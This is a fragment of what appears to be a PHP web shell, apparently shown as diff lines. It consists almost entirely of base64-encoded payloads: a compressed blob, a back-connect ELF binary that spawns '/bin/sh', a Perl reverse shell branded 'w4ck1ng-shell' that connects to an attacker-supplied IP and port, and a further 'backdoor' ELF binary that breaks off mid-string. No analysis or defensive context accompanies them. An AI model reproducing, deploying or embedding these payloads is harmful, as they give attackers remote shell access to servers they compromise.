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"; + +$back_connect_c="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAA2IUECDQAAABMDAAAAAAAADQAIAAHACgAHAAZAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQILAkAACwJAAAFAAAAABAAAAEAAAAsCQAALJkECCyZBAg4AQAAPAEAAAYAAAAAEAAAAgAAAEAJAABAmQQIQJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAABQAAABEAAAAUAAAAAAAAAAAAAAARAAAAEgAAAAcAAAAKAAAACwAAAAgAAAAPAAAAAwAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAABgAAAAAAAAABAAAAAAAAAAkAAAAAAAAADAAAAAAAAAAAAAAADQAAAA4AAAACAAAABAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAAAAAABwBAAASAAAArAAAAAAAAABxAAAAEgAAADwAAAAAAAAACwIAABIAAABIAAAAAAAAAH0AAAASAAAAjAAAAAAAAACsAQAAEgAAAKUAAAAAAAAArwAAABIAAABjAAAAAAAAACcAAAASAAAAkwAAAAAAAADdAAAAEgAAAEMAAAAAAAAAOgAAABIAAABcAAAAAAAAAKoBAAASAAAAVgAAAAAAAAA2AAAAEgAAAHMAAAAAAAAA2QAAABIAAAB4AAAAAAAAACgAAAASAAAAbQAAAAAAAAAOAAAAEgAAAC4AAAAAAAAAeAAAABIAAAB9AAAA8IgECAQAAAARAA4ATwAAAAAAAAA5AAAAEgAAAAEAAAAAAAAAAAAAACAAAAAVAAAAAAAAAAAAAAAgAAAAAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18AbGliYy5zby42AGNvbm5lY3QAZXhlY2wAcGVycm9yAGR1cDIAc3lzdGVtAHNvY2tldABiemVybwBzdHJjYXQAaW5ldF9hZGRyAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABkYWVtb24AX19saWJjX3N0YXJ0X21haW4Ac3RybGVuAGNsb3NlAEdMSUJDXzIuMAAAAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAEAAgAAAAAAAQABACQAAAAQAAAAAAAAABBpaQ0AAAIAsgAAAAAAAAAImgQIBhMAABiaBAgHAQAAHJoECAcCAAAgmgQIBwMAACSaBAgHBAAAKJoECAcFAAAsmgQIBwYAADCaBAgHBwAANJoECAcIAAA4mgQIBwkAADyaBAgHCgAAQJoECAcLAABEmgQIBwwAAEiaBAgHDQAATJoECAcOAABQmgQIBw8AAFSaBAgHEQAAVYnlg+wI6EEBAADolAEAAOjnAwAAycMA/zUQmgQI/yUUmgQIAAAAAP8lGJoECGgAAAAA6eD/////JRyaBAhoCAAAAOnQ/////yUgmgQIaBAAAADpwP////8lJJoECGgYAAAA6bD/////JSiaBAhoIAAAAOmg/////yUsmgQIaCgAAADpkP////8lMJoECGgwAAAA6YD/////JTSaBAhoOAAAAOlw/////yU4mgQIaEAAAADpYP////8lPJoECGhIAAAA6VD/////JUCaBAhoUAAAAOlA/////yVEmgQIaFgAAADpMP////8lSJoECGhgAAAA6SD/////JUyaBAhoaAAAAOkQ/////yVQmgQIaHAAAADpAP////8lVJoECGh4AAAA6fD+//8x7V6J4YPk8FBUUmhoiAQIaBSIBAhRVmiAhgQI6E/////0kJBVieVT6AAAAABbgcMHFAAAUouD/P///4XAdAL/0FhbycOQkJBVieWD7AiAPWSaBAgAdA/rH412AIPABKNgmgQI/9KhYJoECIsQhdJ168YFZJoECAHJw4n2VYnlg+wIoTyZBAiFwHQZuAAAAACFwHQQg+wMaDyZBAj/0IPEEI12AMnDkJBVieVXVlOD7EyD5PC4AAAAAIPAD4PAD8HoBMHgBCnEjX2ovvSIBAj8uQcAAADzpI19r/y5DgAAALAA86qD7AhqAGoB6FD+//+DxBBmx0XIAgCD7AyLRQyDwAj/MOi3/v//g8QQD7fAg+wMUOi4/v//g8QQZolFyoPsDItFDIPABP8w6DH+//+D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EgAAAFwCAAAAAAAAKAAAABIAAABsAgAAZJoECAAAAAAQAPH/cwIAAAyaBAgAAAAAEQAVAIkCAABomgQIAAAAABAA8f+OAgAAAAAAAA4AAAASAAAAnwIAAAAAAAB4AAAAEgAAALICAAAsmQQIAAAAABAC8f/FAgAA8IgECAQAAAARAA4A1AIAAFiaBAgAAAAAEAAWAOECAAAAAAAAOQAAABIAAADzAgAAAAAAAAAAAAAgAAAABwMAACyZBAgAAAAAEALx/x0DAAAAAAAAAAAAACAAAAAAY2FsbF9nbW9uX3N0YXJ0AGNydHN0dWZmLmMAX19DVE9SX0xJU1RfXwBfX0RUT1JfTElTVF9fAF9fSkNSX0xJU1RfXwBwLjAAY29tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4AGZyYW1lX2R1bW15AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU5EX18AX19GUkFNRV9FTkRfXwBfX0pDUl9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgAYmFjay5jAGV4ZWNsQEBHTElCQ18yLjAAX0RZTkFNSUMAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAX19maW5pX2FycmF5X2VuZABfX2Rzb19oYW5kbGUAX19saWJjX2NzdV9maW5pAHN5c3RlbUBAR0xJQkNfMi4wAF9pbml0AGRhZW1vbkBAR0xJQkNfMi4wAF9zdGFydABzdHJsZW5AQEdMSUJDXzIuMABfX2ZpbmlfYXJyYXlfc3RhcnQAX19saWJjX2NzdV9pbml0AGluZXRfYWRkckBAR0xJQkNfMi4wAF9fYnNzX3N0YXJ0AG1haW4AX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfZW5kAGR1cDJAQEdMSUJDXzIuMABzdHJjYXRAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AF9maW5pAF9fcHJlaW5pdF9hcnJheV9lbmQAYnplcm9AQEdMSUJDXzIuMABleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABodG9uc0BAR0xJQkNfMi4wAGNvbm5lY3RAQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfc3RhcnQAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19wcmVpbml0X2FycmF5X3N0YXJ0AF9fZ21vbl9zdGFydF9fAA=="; + +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiOyc7DQokc3lzdGVtMT0gJ2VjaG8gImBpZGAiOyc7DQokc3lzdGVtMj0gJ2VjaG8gImBwd2RgIjsnOw0KJHN5c3RlbTM9ICdlY2hvICJgd2hvYW1pYEBgaG9zdG5hbWVgOn4gPiI7JzsNCiRzeXN0ZW00PSAnL2Jpbi9zaCc7DQokMD0kY21kOw0KJHRhcmdldD0kQVJHVlswXTsNCiRwb3J0PSRBUkdWWzFdOw0KJGlhZGRyPWluZXRfYXRvbigkdGFyZ2V0KSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHByb3RvPWdldHByb3RvYnluYW1lKCd0Y3AnKTsNCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERPVVQsICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsICI+JlNPQ0tFVCIpOw0KcHJpbnQgIlxuXG46OiB3NGNrMW5nLXNoZWxsIChQcml2YXRlIEJ1aWxkIHYwLjMpIHJldmVyc2Ugc2hlbGwgOjpcblxuIjsNCnByaW50ICJcblN5c3RlbSBJbmZvOiAiOyANCnN5c3RlbSgkc3lzdGVtKTsNCnByaW50ICJcbllvdXIgSUQ6ICI7IA0Kc3lzdGVtKCRzeXN0ZW0xKTsNCnByaW50ICJcbkN1cnJlbnQgRGlyZWN0b3J5OiAiOyANCnN5c3RlbSgkc3lzdGVtMik7DQpwcmludCAiXG4iOw0Kc3lzdGVtKCRzeXN0ZW0zKTsgc3lzdGVtKCRzeXN0ZW00KTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; + +$backdoor="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAoIUECDQAAAD4EgAAAAAAADQAIAAHACgAIgAfAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIrAkAAKwJAAAFAAAAABAAAAEAAACsCQAArJkECKyZBAg0AQAAOAEAAAYAAAAAEAAAAgAAAMAJAADAmQQIwJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAAAAAAABEAAAATAAAAAAAAAAAAAAAQAAAAEQAAAAAAAAAAAAAACQAAAAgAAAAFAAAAAwAAAA0AAAAAAAAAAAAAAA8AAAAKAAAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAABAAAAAAAAAAcAAAALAAAAAAAAAAQAAAAMAAAADgAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC4AAAAAAAAAdQEAABIAAACgAAAAAAAAAHEAAAASAAAANAAAAAAAAADMAAAAEgAAAGoAAAAAAAAAWgAAABIAAABMAAAAAAAAAHgAAAASAAAAYwAAAAAAAAA5AAAAEgAAAFgAAAAAAAAAOQAAABIAAACOAAAAAAAAAOYAAAASAAAAOwAAAAAAAAA6AAAAEgAAAFMAAAAAAAAAOQAAABIAAAB1AAAAAAAAALkAAAASAAAAegAAAAAAAAArAAAAEgAAAEcAAAAAAAAAeAAAABIAAABvAAAAAAAAAA4AAAASAAAAfwAAAEiJBAgEAAAAEQAOAEAAAAAAAAAAOQAAABIAAAABAAAAAAAAAAAAAAAgAAAAFQAAAAAAAAAAAAAAIAAAAABfSnZfUmVnaXN0ZXJDbGFzc2VzAF9fZ21vbl9zdGFydF9fAGxpYmMuc28uNgBleGVjbABwZXJ